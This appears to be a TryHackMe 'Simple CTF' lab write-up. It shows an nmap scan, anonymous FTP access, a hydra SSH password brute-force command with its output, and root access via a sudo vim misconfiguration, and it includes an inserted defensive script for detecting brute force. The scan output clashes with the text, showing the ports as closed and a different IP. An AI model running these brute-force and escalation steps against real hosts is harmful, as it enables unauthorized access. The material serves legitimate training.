Hello and welcome to the writeup for TryHackMe's room Simple CTF. As the name suggests, this was a super easy room but I still learned a few things. So, let's start.
Enumeration
As always, I start the enumeration with an nmap scan.
┌──(kali㉿kali)-[~/thm/simplectf]
└─$ nmap -sV -sC -Pn 10.10.152.20
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-13 08:22 EST
Nmap scan report for 10.10.232.210
Host is up (0.41s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT     STATE  SERVICE      VERSION
21/tcp   closed ftp
80/tcp   closed http
2222/tcp closed EtherNetIP-1

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 32.78 seconds
There are three ports open: 21, 80 and 2222. Port 21 is ftp. Although the nmap scan reports it as closed, it's possible that this port allows ftp anonymous login. We can try the anonymous:anonymous credentials to see if it works.
Aha! We are now connected to ftp and we can try to transfer files. Now that I know the credentials, I will use a one-liner wget command to download all available files from the ftp server.
We find a ForMitch.txt. Let's see what the file says.
ForMitch.txt
Dammit man... you'te the worst dev i've seen. You set the same pass for the system user, and the password is so weak... i cracked it in seconds. Gosh... what a mess!
Getting User Shell
The file is addressed "For Mitch" and the sender says Mitch has set the same password for the system user. The sender also implies the password can be cracked in seconds. Just a hunch, but I am guessing one of the users on this machine could be Mitch, and Mitch is a pretty bad developer (according to the sender). So, Mitch might have set a weak password for the SSH service. Now, the THM hint says we can use the best110.txt wordlist to crack the password. We also know the SSH service on this machine is running on Port 2222. Armed with this information, let's try to brute force the password. I will use hydra for cracking the password.
┌──(kali㉿kali)-[~/thm/simplectf]
└─$ hydra -t 4 -l mitch -P /usr/share/seclists/SecLists-master/Passwords/Common-Credentials/best110.txt ssh://10.10.152.20:2222
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-01-16 04:20:08
[DATA] max 4 tasks per 1 server, overall 4 tasks, 110 login tries (l:1/p:110), ~28 tries per task
[DATA] attacking ssh://10.10.152.20:2222/
[STATUS] 40.00 tries/min, 40 tries in 00:01h, 70 to do in 00:02h, 4 active
[STATUS] 32.00 tries/min, 64 tries in 00:02h, 46 to do in 00:02h, 4 active
[STATUS] 28.00 tries/min, 84 tries in 00:03h, 26 to do in 00:01h, 4 active
[2222][ssh] host: 10.10.152.20   login: mitch   password: *****
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-01-16 04:23:23
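From the defender's side, a hydra run like the one above leaves a very recognisable trail in the target's sshd logs. The following is an added example, not part of the original writeup: it parses constructed auth.log lines and flags a source address that racks up repeated failures for one user and then logs in successfully. The log lines, source addresses and thresholds are all assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample of sshd auth.log lines (not from the original writeup): a burst of
# failed logins for "mitch" from one source, followed by a success from that same source.
SAMPLE_AUTH_LOG = """\
Jan 16 04:20:10 Machine sshd[2001]: Failed password for mitch from 10.10.14.5 port 51234 ssh2
Jan 16 04:20:11 Machine sshd[2002]: Failed password for mitch from 10.10.14.5 port 51235 ssh2
Jan 16 04:20:12 Machine sshd[2003]: Failed password for mitch from 10.10.14.5 port 51236 ssh2
Jan 16 04:20:13 Machine sshd[2004]: Failed password for mitch from 10.10.14.5 port 51237 ssh2
Jan 16 04:20:15 Machine sshd[2005]: Failed password for mitch from 10.10.14.5 port 51238 ssh2
Jan 16 04:23:20 Machine sshd[2099]: Accepted password for mitch from 10.10.14.5 port 51300 ssh2
Jan 16 09:00:00 Machine sshd[3001]: Failed password for mitch from 192.168.0.190 port 40000 ssh2
Jan 16 09:30:00 Machine sshd[3002]: Accepted password for mitch from 192.168.0.190 port 40001 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\S+) port \d+ ssh2$"
)

def parse_auth_log(text, year=2024):
    """Turn raw auth.log text into (timestamp, result, user, src) tuples; syslog has no year."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            events.append((ts, m["result"], m["user"], m["src"]))
    return events

def find_brute_force(events, threshold=4, window_seconds=300):
    """Flag (src, user) pairs with >= threshold failures in a sliding window; note a later success."""
    recent = defaultdict(list)
    alerts = {}
    for ts, result, user, src in sorted(events):
        key = (src, user)
        if result == "Failed":
            window = [t for t in recent[key] if (ts - t).total_seconds() <= window_seconds]
            window.append(ts)
            recent[key] = window
            if len(window) >= threshold:
                alerts.setdefault(key, {"failures": 0, "success_after": False})
                alerts[key]["failures"] = len(window)
        elif key in alerts:
            # An accepted login from a source that was already brute forcing = the guess worked.
            alerts[key]["success_after"] = True
    return alerts
```

The single failure from 192.168.0.190 followed by a normal login never reaches the threshold, so only the bursty source is reported.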
We found the password! Let's try SSH-ing to the machine with the username mitch and the cracked password.
┌──(kali㉿kali)-[~/thm/simplectf]
└─$ ssh -p 2222 mitch@10.10.152.20
The authenticity of host '[10.10.152.20]:2222 ([10.10.152.20]:2222)' can't be established.
ED25519 key fingerprint is SHA256:iq4f0XcnA5nnPNAufEqOpvTbO8dOJPcHGgmeABEdQ5g.
This host key is known by the following other names/addresses:
    ~/.ssh/known_hosts:27: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[10.10.152.20]:2222' (ED25519) to the list of known hosts.
mitch@10.10.152.20's password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-58-generic i686)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

0 packages can be updated.
0 updates are security updates.

Last login: Mon Aug 19 18:13:41 2019 from 192.168.0.190
$ whoami
mitch
$ bash
mitch@Machine:~$
Privilege Escalation
Now that we have a full shell as user mitch, we can run sudo -l to see if there are any misconfigurations.
So, we can run the vim program via sudo without a password. This is the classic vim sudo misconfiguration: vim can spawn a shell from inside the editor, and because vim itself is running as root, that shell is not dropped back to the superuser's caller but keeps the superuser privileges, so it can be used to get a root shell.
We have got a root shell! And the machine is pwned. I learned about privilege escalation with Vim and password cracking for SSH running on Port 2222, so this was a fun room. Thank you for reading, I will see you in the next writeup.